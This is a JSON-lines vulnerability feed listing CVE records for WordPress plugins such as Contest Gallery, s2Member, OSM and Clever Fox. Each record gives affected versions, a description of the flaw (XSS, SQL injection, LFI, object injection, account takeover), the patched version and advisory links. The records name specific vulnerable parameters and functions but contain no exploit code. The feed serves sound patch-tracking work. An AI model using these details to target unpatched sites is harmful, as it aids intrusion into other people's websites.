{"CVE_ID":"CVE-2024-9611","slug":"increase-upload-file-size-maximum-execution-time-limit","versionImpact":"2.0","versionEndExcluding":"3.0","description":"The Increase upload file size & Maximum Execution Time limit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c432dbe-8542-41de-966a-b2699d1685ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c432dbe-8542-41de-966a-b2699d1685ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3166370%40increase-upload-file-size-maximum-execution-time-limit&new=3166370%40increase-upload-file-size-maximum-execution-time-limit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3166370%40increase-upload-file-size-maximum-execution-time-limit&new=3166370%40increase-upload-file-size-maximum-execution-time-limit\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/increase-upload-file-size-maximum-execution-time-limit\\\/trunk\\\/library_default_puvox.php?rev=2589469#L8560\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/increase-upload-file-size-maximum-execution-time-limit\\\/trunk\\\/library_default_puvox.php?rev=2589469#L8560\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1274","slug":"pricing-tables-for-wpbakery-page-builder","versionEndExcluding":"3.0","description":"The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) WordPress plugin before 3.0 does not validate some shortcode attributes before using them to generate paths passed to include function\/s, allowing any authenticated users such as subscriber to perform LFI attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/267acb2c-1a95-487f-a714-516de05d2b2f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/267acb2c-1a95-487f-a714-516de05d2b2f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0367","slug":"pricing-tables-for-wpbakery-page-builder","versionEndExcluding":"3.0","description":"The Pricing Tables For WPBakery Page Builder (formerly Visual Composer) WordPress plugin before 3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7685af2-6034-49ea-93ef-4debe72689bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7685af2-6034-49ea-93ef-4debe72689bc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3604","slug":"osm","versionImpact":"3","versionEndExcluding":"3","description":"The OSM \u2013 OpenStreetMap plugin for WordPress is vulnerable to SQL Injection via the 'tagged_filter' attribute of the 'osm_map_v3' shortcode in all versions up to, and including, 6.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8eebc67-e590-4d7f-8925-e5e5090cedf0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8eebc67-e590-4d7f-8925-e5e5090cedf0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8991","slug":"osm","versionImpact":"3","versionEndExcluding":"3","description":"The OSM \u2013 OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's osm_map and osm_map_v3 shortcodes in all versions up to, and including, 6.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/839ecd06-9c74-4ddc-b455-26ec3e627889?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/839ecd06-9c74-4ddc-b455-26ec3e627889?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osm\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm-metabox.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm-metabox.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm.php#L1120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm.php#L1120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm-metabox_v4.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osm\\\/trunk\\\/osm-metabox_v4.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wp-osm-plugin.hyumika.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wp-osm-plugin.hyumika.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157069\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157069\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4706","slug":"wpo365-login","versionImpact":"27.2","versionEndExcluding":"28.0","description":"The WordPress + Microsoft Office 365 \/ Azure AD | LOGIN plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pintra' shortcode in all versions up to, and including, 27.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 28.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602a8030-087b-459f-b649-b4116404cf3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602a8030-087b-459f-b649-b4116404cf3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090428\\\/wpo365-login\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090428\\\/wpo365-login\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36722","slug":"visualcomposer","versionEndExcluding":"27","description":"The Visual Composer plugin for WordPress is vulnerable to Cross-Site Scripting in versions up to, and including, 26.0 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts that execute in a victim's browser.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c476d9af-9060-4294-874a-86e550253d3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c476d9af-9060-4294-874a-86e550253d3b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-xss-vulnerabilities-fixed-in-wordpress-visual-composer-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-xss-vulnerabilities-fixed-in-wordpress-visual-composer-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10229\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10229\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-visual-composer-website-builder-multiple-cross-site-scripting-vulnerabilities-26-0\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-visual-composer-website-builder-multiple-cross-site-scripting-vulnerabilities-26-0\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7725","slug":"contest-gallery","versionImpact":"26.1.0","versionEndExcluding":"26.1.1","description":"The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery \u2013 Upload, Vote, Sell via PayPal or Stripe, Social Share Buttons, OpenAI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the comment feature in all versions up to, and including, 26.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 26.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3334370%40contest-gallery%2Ftrunk&old=3333852%40contest-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3334370%40contest-gallery%2Ftrunk&old=3333852%40contest-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18003103-3a14-4cbc-8bed-87a8ab050308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18003103-3a14-4cbc-8bed-87a8ab050308?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6716","slug":"contest-gallery","versionImpact":"26.0.8","versionEndExcluding":"26.0.9","description":"The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery \u2013 Upload, Vote, Sell via PayPal or Stripe, Social Share Buttons, OpenAI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'upload[1][title]' parameter in all versions up to, and including, 26.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 26.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3321912%40contest-gallery&new=3321912%40contest-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3321912%40contest-gallery&new=3321912%40contest-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54caaf5-f37b-4842-ab3d-8e37cbed58da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54caaf5-f37b-4842-ab3d-8e37cbed58da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1513","slug":"contest-gallery","versionImpact":"26.0.0.1","versionEndExcluding":"26.0.1","description":"The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery \u2013 Upload, Vote, Sell via PayPal or Stripe, Social Share Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Name and Comment field when commenting on photo gallery entries in all versions up to, and including, 26.0.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 26.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3245199%40contest-gallery&new=3245199%40contest-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3245199%40contest-gallery&new=3245199%40contest-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b5cf360-0163-4a7c-8979-ec89ec80ad62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b5cf360-0163-4a7c-8979-ec89ec80ad62?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12562","slug":"s2member-pro","versionImpact":"241216","versionEndExcluding":"250214","description":"The s2Member Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 241216 via deserialization of untrusted input from the 's2member_pro_remote_op' vulnerable parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 250214, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/s2member.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/s2member.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65192fdb-86db-475a-8c61-4db922920cfe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65192fdb-86db-475a-8c61-4db922920cfe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11376","slug":"s2member","versionImpact":"241216","versionEndExcluding":"250214","description":"The s2Member \u2013 Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 241114. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 250214, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/tags\\\/241114\\\/s2member.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/tags\\\/241114\\\/s2member.php#L210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3240794%40s2member&new=3240794%40s2member&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3240794%40s2member&new=3240794%40s2member&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a5c8f46-a686-4b77-8a22-8dec92a96350?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a5c8f46-a686-4b77-8a22-8dec92a96350?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1768","slug":"clever-fox","versionImpact":"25.2.0","versionEndExcluding":"25.2.1","description":"The Clever Fox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's info box block in all versions up to, and including, 25.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 25.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16af8724-595c-4daa-80bd-8125a32cc502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16af8724-595c-4daa-80bd-8125a32cc502?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3096085%40clever-fox&new=3096085%40clever-fox&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3096085%40clever-fox&new=3096085%40clever-fox&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6876","slug":"clever-fox","versionImpact":"25.2.0","versionEndExcluding":"25.2.1","description":"The Clever Fox \u2013 One Click Website Importer by Nayra Themes plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'clever-fox-activate-theme' function in all versions up to, and including, 25.2.0. This makes it possible for authenticated attackers, with subscriber access and above, to modify the active theme, including to an invalid value which can take down the site.","recommendation":"Update to version 25.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e1f94d9-8be6-4174-90a5-820c0207a2fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e1f94d9-8be6-4174-90a5-820c0207a2fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clever-fox\\\/trunk\\\/clever-fox.php#L539\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clever-fox\\\/trunk\\\/clever-fox.php#L539\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3096085%40clever-fox&new=3096085%40clever-fox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3096085%40clever-fox&new=3096085%40clever-fox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8326","slug":"s2member","versionImpact":"241114","versionEndExcluding":"241216","description":"The s2Member \u2013 Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 241114 via the 'sc_get_details' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including user data and database configuration information, which can lead to reading, updating, or dropping database tables. The vulnerability was partially patched in version 241114.","recommendation":"Update to version 241216, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/trunk\\\/src\\\/includes\\\/classes\\\/sc-gets.inc.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/trunk\\\/src\\\/includes\\\/classes\\\/sc-gets.inc.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/trunk\\\/src\\\/includes\\\/classes\\\/sc-gets-in.inc.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/s2member\\\/trunk\\\/src\\\/includes\\\/classes\\\/sc-gets-in.inc.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188157\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188157\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208315\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208315\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/410d4ab0-22dd-4993-afbf-ae6193b70977?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/410d4ab0-22dd-4993-afbf-ae6193b70977?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9240","slug":"redi-restaurant-reservation","versionImpact":"24.0902","versionEndExcluding":"24.1015","description":"The ReDi Restaurant Reservation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 24.0902. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 24.1015, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb9fc87e-b376-49ce-ba69-5acef9deda4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb9fc87e-b376-49ce-ba69-5acef9deda4d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redi-restaurant-reservation\\\/trunk\\\/templates\\\/admin_welcome_no_page.php?rev=2988247#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/redi-restaurant-reservation\\\/trunk\\\/templates\\\/admin_welcome_no_page.php?rev=2988247#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167881\\\/redi-restaurant-reservation\\\/trunk\\\/templates\\\/admin_welcome_no_page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167881\\\/redi-restaurant-reservation\\\/trunk\\\/templates\\\/admin_welcome_no_page.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11103","slug":"contest-gallery","versionImpact":"24.0.7","versionEndExcluding":"24.0.8","description":"The Contest Gallery plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 24.0.7. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 24.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/trunk\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-lost-password.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/trunk\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-lost-password.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/trunk\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-password-reset.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/trunk\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-password-reset.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196011\\\/contest-gallery\\\/tags\\\/24.0.8\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-lost-password.php?old=3190068&old_path=contest-gallery%2Ftags%2F24.0.7%2Fv10%2Fv10-admin%2Fusers%2Ffrontend%2Flogin%2Fajax%2Fusers-login-check-ajax-lost-password.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196011\\\/contest-gallery\\\/tags\\\/24.0.8\\\/v10\\\/v10-admin\\\/users\\\/frontend\\\/login\\\/ajax\\\/users-login-check-ajax-lost-password.php?old=3190068&old_path=contest-gallery%2Ftags%2F24.0.7%2Fv10%2Fv10-admin%2Fusers%2Ffrontend%2Flogin%2Fajax%2Fusers-login-check-ajax-lost-password.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0df7f413-2631-46d9-8c0b-d66f05a02c01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0df7f413-2631-46d9-8c0b-d66f05a02c01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10687","slug":"contest-gallery","versionImpact":"24.0.3","versionEndExcluding":"24.0.4","description":"The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery \u2013 Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to time-based SQL Injection via the $collectedIds parameter in all versions up to, and including, 24.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 24.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd3b4c44-d47a-45de-bcb2-0820e475b331?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd3b4c44-d47a-45de-bcb2-0820e475b331?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/24.0.1\\\/v10\\\/v10-frontend\\\/ecommerce\\\/ecommerce-get-raw-data-from-galleries.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/24.0.1\\\/v10\\\/v10-frontend\\\/ecommerce\\\/ecommerce-get-raw-data-from-galleries.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3175299%40contest-gallery%2Ftags%2F24.0.3&new=3180268%40contest-gallery%2Ftags%2F24.0.4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3175299%40contest-gallery%2Ftags%2F24.0.3&new=3180268%40contest-gallery%2Ftags%2F24.0.4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-38792","slug":"conveythis-translate","versionImpact":"234","versionEndExcluding":"235","description":"Missing Authorization vulnerability in ConveyThis Translate Team Language Translate Widget for WordPress \u2013 ConveyThis allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Language Translate Widget for WordPress \u2013 ConveyThis: from n\/a through 234.","recommendation":"Update to version 235, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/conveythis-translate\\\/wordpress-conveythis-translate-plugin-234-non-arbitrary-options-update-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/conveythis-translate\\\/wordpress-conveythis-translate-plugin-234-non-arbitrary-options-update-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5584","slug":"bookly-responsive-appointment-booking-tool","versionImpact":"23.2","versionEndExcluding":"23.3","description":"The WordPress Online Booking and Scheduling Plugin \u2013 Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Color Profile parameter in all versions up to, and including, 23.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with the staff member role and Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 23.3, or a newer patched 